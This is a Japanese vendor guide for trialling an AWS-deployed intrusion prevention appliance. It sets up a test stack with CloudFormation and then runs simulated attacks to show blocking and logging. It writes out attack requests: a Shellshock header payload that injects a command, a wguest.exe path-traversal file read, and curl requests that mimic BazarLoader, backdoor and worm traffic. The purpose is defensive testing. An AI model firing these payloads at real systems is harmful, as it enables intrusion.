Quick Network Security トライアル

Network Securityの包括的な侵入防御システム (IPS) を活用して、トラフィックを積極的にモニタし、PCI 11.4の要件を満たすための支援を受けましょう。このクイックトライアルガイドでは以下の情報を提供します:

Network SecurityのEdge保護を展開して、受信および送信トラフィックをインターセプトし、AWSのVPC Ingressルーティングを使用してNetwork Security Virtual Applianceにルーティングして検査します。Edge保護およびその他の展開オプションについての詳細はこちら。
CloudFormationテンプレートを使用してサンプルクラウド環境をシミュレートするためのウェブサーバを作成します。

保護の設定

以下の手順に従って、CloudFormationテンプレートを使用してテストスタックを作成してください。

手順

AWSアカウントにログインします。
このリンクをクリックしてCloudFormationスタックを作成してください。
次のパラメータを適切に変更してください:
- SSHキー: - AWSドキュメントでSSHキーについて学ぶ。
- C1APIキー: - Trend Micro Cloud One APIキーの作成方法については、こちらをご覧ください。
- CIDR: - デフォルト設定の0.0.0.0/0では、インターネット上の誰でもあなたのEC2インスタンスにアクセスできます。アクセスをあなたのIPアドレスに制限することを強くお勧めします。インターネットアドレスの確認について詳しくはこちら。

[Create stack]をクリックします。プロセスが完了するまで十分な時間を確保してください。以下のリソースは、スタックの作成が成功した後にデプロイされます。

リソース	詳細
VPC	CIDR 10.0.0.0/16
インターネットゲートウェイ	エッジルートテーブルの関連付け、トラフィックをNetwork Securityインスタンスに誘導します。
サブネット	保護されたサブネット (10.0.0.0/24) 検査サブネット (10.0.1.0/24) 管理サブネット (10.0.2.0/24)
EC2インスタンス	Network Security Virtual Appliance Linuxインスタンスがウェブサーバーを実行中 (テスト環境)
CloudWatchロググループ	Network Securityアプライアンスのログを保存します
NATゲートウェイ	Network SecurityアプライアンスからTrend Micro Cloud OneおよびAWSへのトラフィックを管理するために使用されます。
ルートテーブル	該当なし
セキュリティグループ	該当なし

以下のアーキテクチャ図は、Network Security Edge展開の可視化を提供します。

poc=a211ae12-a9b3-4fe1-bb40-30b4ea2a8a9c.png

注意

このデモには、SNSトピック、CloudWatchアラーム、Lambda関数などの高可用性コンポーネントは含まれていません。これらのリソースをクラウド環境で有効にするには、次のステップに記載されているGet Startedウィザードを使用してください。

攻撃シミュレーション

ネットワークセキュリティVirtual Applianceが攻撃を阻止する様子を確認するには、攻撃をシミュレートするいくつかの簡単なコマンドを実行できます。

インバウンド攻撃

Network SecurityのVirtual Applianceは、既知の脆弱性に一致する着信トラフィックが観測された場合にアラートを送信することで、脆弱なインフラストラクチャを保護する仮想パッチを提供します。以下に示すように、CloudFormationスタックでデプロイされたWebサーバインスタンスをターゲットにして、ローカルホストからこれらの攻撃を実行できます。

16798: HTTP: GNU Bash HTTP Header Remote Code Execution Vulnerability

ローカルホストのコマンドラインシェルから、Webサーバインスタンスをターゲットにして次のコマンドを実行します: curl -H "User-Agent: () { :; } ; /bin/eject" http://<web server ip>

Virtual Applianceは疑わしいトラフィックを検出し、リクエストをブロックします。攻撃のブロックが成功したことを示すログイベントも生成されます。

ログイベントを表示するには、以下の手順に従ってください:

手順

AWSポータルで[Services] → [CloudWatch]に移動します。
左側のナビゲーションメニューから、[Logs] → [Log groups]を選択します。
ロググループc1_network_security_logsで、ログストリームipsBlock_<instanceId>を開きます。各フィルターIDおよび説明に一致するエントリが見つかります。

アウトバウンド攻撃

Network SecurityのVirtual Applianceは、既知の脆弱性に一致するエグレストラフィックが観測されたときにアラートを作成することで、アウトバウンド攻撃から保護します。これを実際に確認するには、CloudFormationスタックで展開されたWebサーバインスタンスから攻撃シミュレーションを実行してください。展開時に指定されたSSHキーを使用して、ログインIDec2-userを使用してインスタンスにSecure Shell (SSH) で接続します。

1292 : HTTP: wguest.exe Exploit

ローカルホストのコマンドラインシェルから、次のコマンドを実行してウェブサーバインスタンスをターゲットにします: curl 'http://www.example.org/server/cgi-bin/wguest.exe?template=c:\boot.ini'

アプライアンスは疑わしいトラフィックを検出し、リクエストをブロックします。攻撃のブロックが成功したことを示すログイベントも生成されます。

不正プログラムフィルターを使用したアウトバウンド攻撃

以下のアウトバウンド攻撃シミュレーションを効率的に実行するには、最新の脅威インテリジェンスパッケージがインストールされていることを確認する必要があります。脅威インテリジェンスシステムが最新であることを確認するには、Network Securityホームページで[Policy] > [Sync Management]に移動します。[Sync Manually]をクリックして最新のパッケージをダウンロードしてください。Network Security脅威インテリジェンスパッケージについて詳細はこちらをご覧ください。

[Note]: アプライアンスは、以下にシミュレートされた攻撃を検出およびブロックするために、最新の脅威インテリジェンス情報に依存しています。続行する前に同期が完了していることを確認してください。

以下の手順に従って攻撃シミュレーションを実行してください:

攻撃	メソッド/結果
25492: HTTP: Trojan-Downloader.Win64.BazarLoader.A ランタイム検出	Webサーバインスタンスのコマンドラインシェルから、次のコマンドを実行します: `curl -H 'User-Agent: sdvntyer' http://www.example.com/api/v88` アプライアンスは疑わしいトラフィックを検出し、リクエストをブロックします。攻撃のブロックが成功したことを示すログイベントも生成されます。
34738: HTTP: Backdoor.Shell.Dragonmuddy.A ランタイム検出	Webサーバインスタンスのコマンドラインシェルから、次のコマンドを実行します: `curl 'http://www.example.com/includes/main.php?t=7d4580a3910c54d62b46f24c397c8d59&f=g2&type=cmd&id=D7CB4B6E5A21CA596DE0A7E10059C85E` アプライアンスは疑わしいトラフィックを検出し、リクエストをブロックします。攻撃のブロックが成功したことを示すログイベントも生成されます。
38451: HTTP: Worm.Python.KashmirBlack.A ランタイム検出	Webサーバインスタンスのコマンドラインシェルから、次のコマンドを実行します: `curl -H 'User-Agent: ArcherGhost' -d 'post=eyJkYXRhIjogeyJkb21haW4iOiAiaHR0cDovL3RhcmdldDEyMy5jb20vYXNzZXRzL3ZlbmRvci9waHB1bml0L3BocHVuaXQvc3JjL1V0aWwvUEhQL3Nzc3AucGhwIiwgInNlcnZlciI6ICIxOTIuMTY4LjEwNy4xOSIsICJ0aXRsZSI6ICJqcSJ9LCAidHlwZSI6ICJzY2FubmVyIn0%3D' http://www.example.com/adeliap/404.php`

上記の指示に従ってログイベントを表示してください。

注意

イベントがCloudWatchに反映されるまでに数秒かかる場合があります。

これらの攻撃について詳しく知る

[Network Security]の下で、[Policy] > [Intrusion Prevention Filtering]を選択します。SearchフィールドにフィルターIDを入力して、詳細を表示します。

次のステップ

Network Securityによって提供されるインバウンドおよびアウトバウンド保護を体験したところで、クラウドインフラストラクチャを保護するための次のステップを踏みましょう。

Network Security管理インターフェイスのGet Startedウィザードを使用して展開を開始します。これにより、クラウドアカウントから取得した情報を使用してネットワークにエッジ保護を展開する新しいCloudFormationテンプレートが生成されます。

Edge展開が環境に適していない場合は、詳細を確認して、AWSで利用可能なすべてのNetwork Security展開オプションについて学ぶことができます。